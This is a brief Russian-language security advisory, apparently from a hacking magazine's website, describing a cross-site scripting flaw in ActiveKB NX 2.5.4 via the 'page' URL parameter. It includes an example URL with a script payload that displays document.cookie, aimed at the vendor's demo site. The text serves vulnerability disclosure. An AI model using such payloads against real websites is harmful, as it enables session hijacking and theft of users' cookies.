Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: ActiveKB NX 2.5.4
Удаленный атакующий может с помощью специально сформированного URL выполнить произвольный HTML код в браузере жертвы.
Пример:
http://www.target.com/activekb/ActiveKB/?page=[XXS]
http://www.interspire.com/activekb/demo/default/categories/ActiveKB/ ?page=%3Cscript%3Ealert(document.cookie);%3C/script%3E